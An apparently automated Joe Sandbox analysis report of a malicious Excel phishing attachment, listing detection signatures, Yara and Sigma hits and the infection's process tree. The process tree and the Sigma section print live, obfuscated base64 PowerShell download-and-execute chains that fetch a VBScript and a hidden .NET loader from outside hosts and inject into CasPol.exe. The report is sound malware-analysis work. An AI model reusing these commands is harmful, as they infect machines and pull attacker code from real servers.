Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping Document.xla.xlsx

Overview

General Information

Sample name:Shipping Document.xla.xlsx
Analysis ID:1563179
MD5:54649fa2a8306383f72c8d8299a40998
SHA1:873a48d89b2a2110c2edd79792fc1bdb13105d8d
SHA256:ed2615dc3a9adfa6b3c4f5257f9497349f0fcca5d17e9c94622bf7af4db68a3b
Tags:xlsxuser-lowmal3
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3344 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3648 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3784 cmdline: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3988 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 1808 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 2168 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
              • CasPol.exe (PID: 2644 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
              • CasPol.exe (PID: 2572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
              • CasPol.exe (PID: 3176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
              • CasPol.exe (PID: 1776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 2460INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x16566:$b2: ::FromBase64String(
    • 0x16fe6:$b2: ::FromBase64String(
    • 0x181d3:$b2: ::FromBase64String(
    • 0x18908:$b2: ::FromBase64String(
    • 0x19184:$b2: ::FromBase64String(
    • 0x19870:$b2: ::FromBase64String(
    • 0x933e4:$b2: ::FromBase64String(
    • 0x93c28:$b2: ::FromBase64String(
    • 0x162f6:$b3: ::UTF8.GetString(
    • 0x16d76:$b3: ::UTF8.GetString(
    • 0x17f63:$b3: ::UTF8.GetString(
    • 0x18698:$b3: ::UTF8.GetString(
    • 0x18f14:$b3: ::UTF8.GetString(
    • 0x19600:$b3: ::UTF8.GetString(
    • 0x4913c:$b3: ::UTF8.GetString(
    • 0x4ab9f:$b3: ::UTF8.GetString(
    • 0x4b52a:$b3: ::UTF8.GetString(
    • 0x4cc29:$b3: ::UTF8.GetString(
    • 0x4ef35:$b3: ::UTF8.GetString(
    • 0x4fa19:$b3: ::UTF8.GetString(
    • 0x50833:$b3: ::UTF8.GetString(
    Process Memory Space: powershell.exe PID: 924JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 924INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x57d3:$b2: ::FromBase64String(
      • 0x5e41:$b2: ::FromBase64String(
      • 0x1d3cc:$b2: ::FromBase64String(
      • 0x1dc16:$b2: ::FromBase64String(
      • 0x1f157:$b2: ::FromBase64String(
      • 0x1f838:$b2: ::FromBase64String(
      • 0x43d9a:$b2: ::FromBase64String(
      • 0x4447c:$b2: ::FromBase64String(
      • 0x4b861:$b2: ::FromBase64String(
      • 0x4c769:$b2: ::FromBase64String(
      • 0x4def4:$b2: ::FromBase64String(
      • 0x6a88c:$b2: ::FromBase64String(
      • 0xbc613:$b2: ::FromBase64String(
      • 0xc587d:$b2: ::FromBase64String(
      • 0xc8215:$b2: ::FromBase64String(
      • 0xc88ee:$b2: ::FromBase64String(
      • 0x5563:$b3: ::UTF8.GetString(
      • 0x5bd1:$b3: ::UTF8.GetString(
      • 0x1d15c:$b3: ::UTF8.GetString(
      • 0x1d9a6:$b3: ::UTF8.GetString(
      • 0x1eee7:$b3: ::UTF8.GetString(

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3du
      Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta
      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = 